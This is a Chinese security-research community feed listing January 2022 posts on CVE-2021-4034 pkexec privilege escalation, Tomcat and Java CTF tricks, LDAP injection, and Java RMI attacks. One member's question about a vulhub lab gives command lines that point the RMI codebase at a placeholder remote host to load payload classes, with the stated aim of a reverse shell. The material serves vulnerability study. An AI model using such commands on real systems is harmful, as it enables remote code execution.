你尚未登录

未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。

cc

2022 一月 26
CVE-2021-4034 pkexec 本地提权:从内存越界到参数注入 Qualys 近期公开了...
2022 一月 25
这里两个好玩的东西: 1.为什么往 /WEB-IN...

附件


# 附件名 大小 时间 操作
从RWCTF学习到的两个关于Tomcat的有趣问题.pdf 2.4 MB 01/25/2022
2022 一月 24
记一次src测试中的ldap注入的深入...

附件


# 附件名 大小 时间 操作
记一次src测试中的ldap注入的深入利用.pdf 805.2 KB 01/24/2022
2022 一月 24
这周的RWCTF中有一个特别有意思的Java,...

附件


# 附件名 大小 时间 操作
从DesperateCat中学会的新利用方式.pdf 3.6 MB 01/24/2022
2022 一月 24
4ra1n师傅: 由于一些原因我知识星球号没了,而且三个月不能注册,所以拜托认识的师傅帮忙...

图片


2022 一月 23
@abcd:

p神,你昨天晚上分享的那个rmi工具,提到了这个 - 绕过localhost限制来执行bind、unbind等写入操作(CVE-2019-2684) 翻了一下好像没找到哪里有对这个cve的相关分析,不知道是不是没找到,师傅有看到过吗

我发的P...

图片


2022 一月 23
有空可以研究一下为什么这个案例里可以使用/.%00....
2022 一月 23
@路人甲:

尝试复现vulhub中的rmi-codebase,远程codebase上托管的payload如下,客户端调用都返回了7,怎么没有反弹shell呢,换成其他命令执行也不行。 具体步骤如下: 1.编译远程codebase上的RMIClient类及其内部类,并开启http服务; 2.运行rmiserver端,java -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer; 3.运行rmiclient端,java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://x.x.x.x:9980/ RMIClient 现象:http server收到了获取class的请求;client端未报错,输出7

可以回顾一下《Java安全漫谈》第一篇文章,里面有介绍下图三种初始化的代码在Java中有什么不同: ...

图片


2022 一月 23
本人web安全小白,目前信安大...